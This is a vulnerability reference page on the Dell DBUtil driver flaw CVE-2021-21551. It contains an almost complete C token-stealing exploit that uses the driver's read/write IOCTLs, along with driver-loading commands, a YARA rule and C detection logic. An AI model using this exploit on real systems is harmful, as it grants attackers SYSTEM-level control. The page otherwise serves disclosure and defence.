
CVE-2021-21551

Dell DBUtil — arbitrary kernel read/write via insufficient IOCTL access control

Summary

Field                    Value
Driver                   DBUtil_2_3.sys
Vendor                   Dell
Vulnerability class      Arbitrary kernel read/write (missing IOCTL access control)
Abused version           2.3 (shipped with Dell BIOS update utilities)
Status                   Blocklisted; included in the Microsoft Vulnerable Driver Blocklist
Exploited in the wild    Yes

BYOVD Context

  • Driver signing: Authenticode-signed by Dell with a valid certificate; accepted by Windows driver signature enforcement
  • Vulnerable Driver Blocklist: Included in Microsoft's recommended driver block rules since 2022
  • HVCI behavior: Blocked wherever the Vulnerable Driver Blocklist is enforced (HVCI / memory integrity, or by default from Windows 11 22H2 onward); on systems without enforcement the driver loads normally because its signature is valid
  • KDU integration: Integrated as a KDU provider
  • LOLDrivers: Listed at loldrivers.io with SHA256 hashes and detection rules

Affected IOCTLs

  • 0x9B0C1EC4 — Arbitrary virtual memory read
  • 0x9B0C1EC8 — Arbitrary virtual memory write
  • 0x9B0C1ECC — Arbitrary physical memory read (via MmMapIoSpace)
  • 0x9B0C1ED0 — Arbitrary physical memory write (via MmMapIoSpace)
  • 0x9B0C1ED4 — MSR read/write

Root Cause

DBUtil_2_3.sys ships inside Dell's BIOS update utilities (Dell Command Update, Dell Update, Alienware Update), which drop it to disk and load it on demand to give the updater the hardware access that firmware flashing needs. The file is left behind in C:\Windows\Temp and the user's %LOCALAPPDATA%\Temp, which is why Dell's remediation for CVE-2021-21551 tells administrators to delete it from both locations. The driver creates a device object (\Device\DBUtil, reachable as \\.\DBUtil) with a security descriptor that lets any user on the machine, not only administrators, open a handle.

The driver exposes five IOCTL codes that give direct, unchecked access to kernel virtual memory, physical memory, and CPU MSRs. There is no check of the caller's privilege, no address range validation, and no restriction on which regions may be touched: each request carries a caller-supplied address and size, and the driver performs the copy directly with RtlCopyMemory (virtual memory) or MmMapIoSpace followed by RtlCopyMemory (physical memory). A bad address therefore bugchecks the machine rather than being rejected, which is worth remembering when testing.

This is not a memory-safety bug but a design-level vulnerability: the driver was built to hand its companion user-mode utility raw hardware access, and with no access control on the device or the IOCTLs, every process on the system gets the same. The standard hardening is to create the device with IoCreateDeviceSecure and an SDDL that limits opens to SYSTEM and Administrators, and to expose only named, validated operations (read this register, write this flash region) instead of accepting raw kernel addresses from user mode. SentinelLabs' disclosure (May 2021) and Connor McGarr's exploit writeup provide the detailed analysis.

Exploitation

Exploitation is trivial because the driver hands out the read/write primitive directly. The attacker:

  1. Gets the driver loaded: sc.exe create ... type= kernel binPath= ... followed by sc.exe start, or a hand-written Services registry key plus NtLoadDriver. Either route needs SeLoadDriverPrivilege, i.e. an administrator, so in BYOVD use the bug is an admin-to-kernel step. If the driver is already loaded (for instance while Dell's updater is running), this step is unnecessary and what follows is an unprivileged local privilege escalation.
  2. Opens a handle to \\.\DBUtil; the device's security descriptor allows this from any user.
  3. Obtains a kernel pointer into the EPROCESS list. PsGetCurrentProcess is a kernel export and cannot be called from user mode; the usual sources are the ntoskrnl base from EnumDeviceDrivers plus the RVA of the PsInitialSystemProcess export (which holds the SYSTEM process's EPROCESS address), or the object address of one of the attacker's own process handles from NtQuerySystemInformation(SystemHandleInformation), both available at medium integrity. The read IOCTL then walks ActiveProcessLinks.
  4. Reads the Token field (an EX_FAST_REF pointer) from the SYSTEM process's EPROCESS, PID 4. The field offsets are build-specific and come from ntoskrnl symbols.
  5. Uses the write IOCTL to overwrite its own EPROCESS.Token with that value.
  6. The calling process now runs as SYSTEM and spawns a child (cmd.exe, for instance) that inherits the token.

The entire exploit fits in roughly 100 lines of C: no heap spray, no race condition, no memory corruption, just direct IOCTL calls. Multiple ransomware groups have used this driver in the wild.
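The procedure above as an added example in C, written for this page and not taken from the page, from Dell, or from any published exploit. The IOCTL codes come from the list above; the EPROCESS offsets and the four-slot request layout are assumptions that must be verified against the target's ntoskrnl symbols and the driver itself. The walk and the token swap are exercised offline against a constructed memory image so the logic can be run without the driver, and obtaining the first EPROCESS pointer (step 3) is left to the caller.

```c
#include <stdint.h>
#include <string.h>
#define IOCTL_DBUTIL_VIRT_READ  0x9B0C1EC4   /* virtual memory read, from the IOCTL list above */
#define IOCTL_DBUTIL_VIRT_WRITE 0x9B0C1EC8   /* virtual memory write */

/* ASSUMPTION: EPROCESS offsets are build-specific; these match one Windows 10 x64 build. Take them from symbols. */
#define OFF_UNIQUE_PROCESS_ID 0x440
#define OFF_ACTIVE_LINKS      0x448
#define OFF_TOKEN             0x4b8
#define SYSTEM_PID            4

/* The primitive sits behind function pointers so one EPROCESS walk runs against the driver or a constructed image. */
typedef struct {
    int (*read8)(void *ctx, uint64_t addr, uint64_t *out);   /* 0 on success, -1 on failure */
    int (*write8)(void *ctx, uint64_t addr, uint64_t val);
    void *ctx;
} kmem_t;

/* Step 3: walk ActiveProcessLinks from any known EPROCESS until UniqueProcessId == pid. */
uint64_t find_eprocess(kmem_t *k, uint64_t start, uint64_t pid) {
    uint64_t cur = start;
    for (int i = 0; i < 4096; i++) {             /* bounded: a corrupted list must not spin forever */
        uint64_t id, flink;
        if (k->read8(k->ctx, cur + OFF_UNIQUE_PROCESS_ID, &id)) return 0;
        if (id == pid) return cur;
        if (k->read8(k->ctx, cur + OFF_ACTIVE_LINKS, &flink)) return 0;
        cur = flink - OFF_ACTIVE_LINKS;          /* CONTAINING_RECORD(flink, EPROCESS, ActiveProcessLinks) */
        if (cur == start) break;                 /* the list is circular: back at start means not found */
    }
    return 0;
}

/* Steps 4 and 5: copy SYSTEM's Token (an EX_FAST_REF, 8 bytes) over the caller's. */
int steal_token(kmem_t *k, uint64_t start, uint64_t my_pid) {
    uint64_t sys = find_eprocess(k, start, SYSTEM_PID);
    uint64_t me  = find_eprocess(k, start, my_pid);
    uint64_t tok;
    if (!sys || !me) return -1;
    if (k->read8(k->ctx, sys + OFF_TOKEN, &tok)) return -1;
    return k->write8(k->ctx, me + OFF_TOKEN, tok);
}

#ifdef _WIN32
#include <windows.h>
/* Driver backend. ASSUMPTION: a request is four 8-byte slots {padding, address, offset, value}; reads return slot 3. */
static int dbutil_read8(void *ctx, uint64_t addr, uint64_t *out) {
    uint64_t req[4] = {0x4141414141414141ULL, addr, 0, 0}, resp[4] = {0};
    DWORD n;
    if (!DeviceIoControl((HANDLE)ctx, IOCTL_DBUTIL_VIRT_READ, req, sizeof req,
                         resp, sizeof resp, &n, NULL)) return -1;
    *out = resp[3];
    return 0;
}
static int dbutil_write8(void *ctx, uint64_t addr, uint64_t val) {
    uint64_t req[4] = {0x4141414141414141ULL, addr, 0, val};
    DWORD n;
    return DeviceIoControl((HANDLE)ctx, IOCTL_DBUTIL_VIRT_WRITE, req, sizeof req,
                           req, sizeof req, &n, NULL) ? 0 : -1;
}
/* Step 2 on a target: HANDLE h = CreateFileA("\\\\.\\DBUtil", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
 * then kmem_t k = {dbutil_read8, dbutil_write8, h}; steal_token(&k, leaked_eprocess, GetCurrentProcessId()); */
#endif

/* Offline backend: a constructed "kernel memory" image with two EPROCESS structures (SYSTEM, caller) in a circular list. */
#define FAKE_BASE    0xFFFF800000000000ULL
#define FAKE_SIZE    0x2000
#define EP_SYSTEM    (FAKE_BASE + 0x0000)
#define EP_ME        (FAKE_BASE + 0x1000)
#define SYSTEM_TOKEN 0xFFFF9A0012345670ULL       /* constructed value */
#define MY_PID       1234
#define IN_IMAGE(a)  ((a) >= FAKE_BASE && (a) - FAKE_BASE <= FAKE_SIZE - 8)   /* overflow-safe bounds check */

static int fake_read8(void *ctx, uint64_t addr, uint64_t *out) {
    if (!IN_IMAGE(addr)) return -1;              /* unmapped: fail the way a page fault would */
    memcpy(out, (uint8_t *)ctx + (addr - FAKE_BASE), 8);
    return 0;
}
static int fake_write8(void *ctx, uint64_t addr, uint64_t val) {
    if (!IN_IMAGE(addr)) return -1;
    memcpy((uint8_t *)ctx + (addr - FAKE_BASE), &val, 8);
    return 0;
}

/* Builds the image, runs the theft for my_pid and returns the caller's Token afterwards:
 * SYSTEM_TOKEN on success, 0 when my_pid is not in the list and nothing was written. */
uint64_t demo_offline(uint64_t my_pid) {
    static uint8_t img[FAKE_SIZE];
    kmem_t k = { fake_read8, fake_write8, img };
    uint64_t tok = 0;
    memset(img, 0, sizeof img);
    fake_write8(img, EP_SYSTEM + OFF_UNIQUE_PROCESS_ID, SYSTEM_PID);
    fake_write8(img, EP_SYSTEM + OFF_ACTIVE_LINKS, EP_ME + OFF_ACTIVE_LINKS);
    fake_write8(img, EP_SYSTEM + OFF_TOKEN, SYSTEM_TOKEN);
    fake_write8(img, EP_ME + OFF_UNIQUE_PROCESS_ID, MY_PID);
    fake_write8(img, EP_ME + OFF_ACTIVE_LINKS, EP_SYSTEM + OFF_ACTIVE_LINKS);
    fake_write8(img, EP_ME + OFF_TOKEN, 0xFFFF9A00ABCDEF00ULL);   /* the caller's own token, constructed */
    if (steal_token(&k, EP_ME, my_pid) == 0) fake_read8(img, EP_ME + OFF_TOKEN, &tok);
    return tok;
}
```

On a target the Windows backend replaces the offline one and `start` is whatever kernel pointer step 3 produced; because the list is circular, any EPROCESS in it works as the starting point. Two details matter in practice: the walk is bounded and every read failure aborts, because a wrong offset sends the driver to an unmapped address and the result is a bugcheck, not an error code; and the 8-byte write copies the whole EX_FAST_REF without adjusting the token's reference count, so on exit the process drops a reference it never took. SYSTEM's long-lived token usually tolerates that, but it is the classic source of crashes in sloppy token-stealing exploits.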

Detection

YARA Rule

rule CVE_2021_21551_DBUtil {
    meta:
        description = "Detects Dell DBUtil_2_3.sys vulnerable driver"
        cve = "CVE-2021-21551"
        author = "KernelSight"
        severity = "critical"
    strings:
        $mz = { 4D 5A }
        $driver_name = "DBUtil" wide ascii nocase
        $device = "\\Device\\DBUtil" wide ascii
        $dell_cert = "Dell Inc" wide ascii
    condition:
        $mz at 0 and $driver_name and ($device or $dell_cert)
}

ETW Indicators

  • Microsoft-Windows-Kernel-File (file create/write): the driver file being written to a temp or user-writable path before it is loaded. Dell's own updater drops DBUtil_2_3.sys into C:\Windows\Temp as well, so pair this with the file hash and with who loaded it.
  • Microsoft-Windows-Kernel-Process (image load): the kernel-mode image load of DBUtil_2_3.sys with its path; driver loads are attributed to the System process (PID 4).
  • Microsoft-Windows-Security-Auditing, Event 4697 (a service was installed): fires when the driver service is registered through the Service Control Manager (sc.exe create, CreateService), as does System log Event 7045. A hand-written Services key loaded with NtLoadDriver bypasses the SCM and raises neither.
  • Microsoft-Windows-Security-Auditing, Event 4688 (process created): there is no event for the kernel-side overwrite of EPROCESS.Token, so the theft shows up indirectly: children of the exploit process are created with SYSTEM as the subject although the parent chain belongs to an interactive user.
  • Sysmon Event ID 6 (driver loaded): ImageLoaded path, Signed/Signature status and Hashes; match the hash against the loldrivers.io entry rather than trusting the path.

Behavioral Indicators

  • A copy of DBUtil_2_3.sys (by hash) on disk or loaded at all: the version is blocklisted, so any instance is a finding. Path is a weak discriminator because Dell's updater itself drops the file into C:\Windows\Temp and %LOCALAPPDATA%\Temp; a copy in Downloads, ProgramData or an attacker's working directory is still the stronger signal.
  • A rapid sequence of DeviceIoControl calls to \\.\DBUtil with the read and write IOCTLs carrying kernel addresses (visible only to a sensor that hooks or traces IRP_MJ_DEVICE_CONTROL on that device).
  • A process jumping from medium integrity to SYSTEM without passing through the standard elevation paths (UAC consent, runas, a service start).
  • Kernel-driver service creation whose requester is not a Dell update utility. With sc.exe the registry key is written by services.exe on the caller's behalf, so the requester comes from Event 4697 / 7045 and the sc.exe process-creation event, not from the registry write; a non-SCM process writing Services\<name>\ImagePath itself is the NtLoadDriver variant.
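The indicators above as detection logic, an added example written for this page (not KernelSight's or Dell's code) in C, the language of the page's other example, over constructed Sysmon records: a driver-load classifier keyed on the file hash rather than the path, and a registry-event classifier that separates a hand-written Services key from SCM registration. The sample events, service name and paths are constructed, and the hash is a placeholder standing in for the SHA256 values loldrivers.io publishes for DBUtil_2_3.sys.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

enum verdict {
    CLEAN = 0,
    BLOCKLISTED_HASH = 1,         /* Sysmon 6: a hash on the known-vulnerable list was loaded, whatever the path */
    DIRECT_SERVICE_KEY_WRITE = 2, /* Sysmon 13: a non-SCM process wrote Services\<name>\ImagePath (NtLoadDriver prep) */
    SCM_REGISTRATION = 3          /* Sysmon 13: services.exe wrote it (sc create / CreateService); requester is in 4697 / 7045 */
};

/* Case-insensitive helpers: Windows paths and registry keys are case-insensitive. */
static int ieq_n(const char *a, const char *b, size_t n) {
    for (size_t i = 0; i < n; i++)            /* a '\0' in a mismatches any needle byte, so there is no overread */
        if (tolower((unsigned char)a[i]) != tolower((unsigned char)b[i])) return 0;
    return 1;
}
static int icontains(const char *hay, const char *needle) {
    size_t n = strlen(needle);
    for (; *hay; hay++) if (ieq_n(hay, needle, n)) return 1;
    return n == 0;
}
static int iends_with(const char *s, const char *suffix) {
    size_t ls = strlen(s), lx = strlen(suffix);
    return ls >= lx && ieq_n(s + ls - lx, suffix, lx);
}

/* Sysmon Event ID 6 (Driver loaded). Dell's own updater drops dbutil_2_3.sys into
 * C:\Windows\Temp and the user's Temp, so the path decides nothing; the hash does.
 * Sysmon formats the Hashes field as "SHA256=<hex>,IMPHASH=<hex>". */
enum verdict classify_driver_load(const char *hashes, const char *const *bad_sha256, size_t n_bad) {
    const char *p = strstr(hashes, "SHA256=");
    if (!p) return CLEAN;
    p += strlen("SHA256=");
    for (size_t i = 0; i < n_bad; i++) {
        size_t len = strlen(bad_sha256[i]);
        if (ieq_n(p, bad_sha256[i], len) && (p[len] == ',' || p[len] == '\0')) return BLOCKLISTED_HASH;
    }
    return CLEAN;
}

/* Sysmon Event ID 13 (registry value set) on Services\<name>\ImagePath naming dbutil.
 * Image is the writing process. services.exe means SCM registration, which Dell's updater
 * and an attacker running sc.exe both produce, so the requester must come from Security
 * 4697 / System 7045; any other writer built the key by hand for NtLoadDriver. */
enum verdict classify_service_registration(const char *target_object, const char *details, const char *image) {
    if (!icontains(target_object, "\\Services\\") || !iends_with(target_object, "\\ImagePath")) return CLEAN;
    if (!icontains(details, "dbutil")) return CLEAN;
    return iends_with(image, "\\services.exe") ? SCM_REGISTRATION : DIRECT_SERVICE_KEY_WRITE;
}

/* Constructed sample events, not real telemetry. The hash is a placeholder standing in for
 * the SHA256 values loldrivers.io publishes for DBUtil_2_3.sys. */
static const char *const BAD_SHA256[] = {
    "0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef"
};
#define N_BAD (sizeof BAD_SHA256 / sizeof BAD_SHA256[0])
#define SERVICES_KEY "HKLM\\System\\CurrentControlSet\\Services\\DBUtil_2_3\\ImagePath"

/* Dell's updater loading its own copy from Temp: still a finding, the file has to go. */
int demo_load_vulnerable_copy(void) {
    return classify_driver_load("SHA256=0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF,IMPHASH=00112233",
                                BAD_SHA256, N_BAD);
}
int demo_load_other_driver(void) {
    return classify_driver_load("SHA256=ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff,IMPHASH=00112233",
                                BAD_SHA256, N_BAD);
}
/* loader.exe in Downloads writing ImagePath itself before calling NtLoadDriver. */
int demo_handwritten_key(void) {
    return classify_service_registration(SERVICES_KEY, "\\??\\C:\\Users\\bob\\Downloads\\dbutil_2_3.sys",
                                         "C:\\Users\\bob\\Downloads\\loader.exe");
}
/* sc.exe create: the SCM writes the key, so the requester has to come from 4697 / 7045. */
int demo_scm_registration(void) {
    return classify_service_registration(SERVICES_KEY, "\\??\\C:\\Windows\\Temp\\DBUtil_2_3.sys",
                                         "C:\\Windows\\System32\\services.exe");
}
```

The design choice is to treat the hash as the primary key and the path as context: the blocklisted version is a finding wherever it sits, including the copy Dell's own updater leaves in Temp, while the registry classifier only tells you whether the SCM or some other process installed the service, and in the SCM case the requester still has to be pulled from 4697 / 7045 and the sc.exe process-creation event.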

References